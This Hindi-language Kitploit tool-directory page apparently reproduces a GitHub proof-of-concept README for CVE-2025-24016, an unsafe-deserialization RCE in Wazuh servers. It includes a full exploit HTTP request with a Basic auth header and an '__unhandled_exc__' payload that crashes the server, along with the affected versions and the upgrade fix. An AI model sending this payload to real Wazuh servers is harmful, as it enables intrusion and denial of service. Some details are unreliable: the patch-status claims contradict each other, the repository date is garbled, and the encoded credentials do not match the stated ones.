Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-24016 — CVE-2025-24016: Wazuh सर्वर में RCE! रिमोट कोड निष्पादन | Kitploit
उपकरण/GitHubGitHub/glostarrx1/cve-2025-24016
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubglostarrx1/cve-2025-24016

CVE-2025-24016

CVE-2025-24016: Wazuh सर्वर में RCE! रिमोट कोड निष्पादन

रिपॉजिटरी देखें
161 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

Wazuh रिमोट कोड एक्ज़ीक्यूशन (RCE) - PoC

भेद्यता अवलोकन

यह रिपॉज़िटरी Wazuh सर्वर में रिमोट कोड एक्ज़ीक्यूशन (RCE) भेद्यता को प्रदर्शित करती है, जो wazuh-manager पैकेज में असुरक्षित डिसीरियलाइज़ेशन के कारण उत्पन्न हुई है। यह भेद्यता API एक्सेस वाले रिमोट हमलावरों (समझौता किया गया डैशबोर्ड, क्लस्टर में Wazuh सर्वर, या समझौता किए गए एजेंटों वाले कुछ कॉन्फ़िगरेशन) को सर्वर पर मनमाना कोड निष्पादित करने की अनुमति देती है।

प्रभावित संस्करण

  • wazuh-manager संस्करण >= 4.4.0
  • संस्करण >= 4.9.1 में पैच किया गया

विवरण

यह भेद्यता Wazuh API में होती है, जहाँ DistributedAPI में पैरामीटर JSON के रूप में सीरियलाइज़ किए जाते हैं और framework/wazuh/core/cluster/common.py फ़ाइल में as_wazuh_object का उपयोग करके डिसीरियलाइज़ किए जाते हैं। एक हमलावर DAPI अनुरोधों में एक अनसैनिटाइज़्ड डिक्शनरी इंजेक्ट करके इस भेद्यता का फायदा उठा सकता है, जिससे मनमाना Python कोड का मूल्यांकन हो सकता है।

RCE को run_as एंडपॉइंट का उपयोग करके ट्रिगर किया जा सकता है, जो हमलावर को auth_context तर्क को नियंत्रित करने की अनुमति देता है। दुर्भावनापूर्ण अनुरोध तैयार करके, मास्टर सर्वर पर मनमाना कोड निष्पादित किया जा सकता है।

प्रूफ ऑफ कॉन्सेप्ट

सर्वर API का उपयोग करके इस भेद्यता को ट्रिगर करने के लिए, नीचे दिए गए चरणों का पालन करें।

PoC Burp Suite अनुरोध

  1. भेद्यता ट्रिगर करने के लिए Burp Suite अनुरोध:
root@kitploit:~
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36
Accept: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg==  # Base64-encoded "wazuh-wui:MyS3cr37P450r.*-"
Content-Type: application/json
Content-Length: 83

{
  "__unhandled_exc__": {
    "__class__": "exit",
    "__args__": []
  }
}

Solution Image

  1. अनुरोध का स्पष्टीकरण:
  • प्रमाणीकरण हेडर: यह base64-एन्कोडेड प्रमाणीकरण है (wazuh-wui:MyS3cr37P450r.*-)।
  • पेलोड: दुर्भावनापूर्ण पेलोड में अनसैनिटाइज़्ड अपवाद __unhandled_exc__ होता है जो मनमाना Python कोड (exit इस मामले में) के निष्पादन को ट्रिगर करता है।

प्रभाव

  • रिमोट कोड एक्ज़ीक्यूशन (RCE): यह भेद्यता हमलावरों को Wazuh सर्वर पर मनमाना कोड निष्पादित करने की अनुमति देती है, जो संस्करण >= 4.4.0 से 4.9.0 तक (अभी तक पैच नहीं किया गया) को प्रभावित करती है।
  • संभावित डिनायल ऑफ सर्विस: इस PoC में, exit फ़ंक्शन ट्रिगर होता है, जिससे Wazuh सर्वर बंद हो जाता है।

शमन

अपने सिस्टम को सुरक्षित रखने के लिए, Wazuh संस्करण >= 4.9.1 में अपग्रेड करें जहाँ इस समस्या को पैच किया गया है।

टूल डाउनलोड करें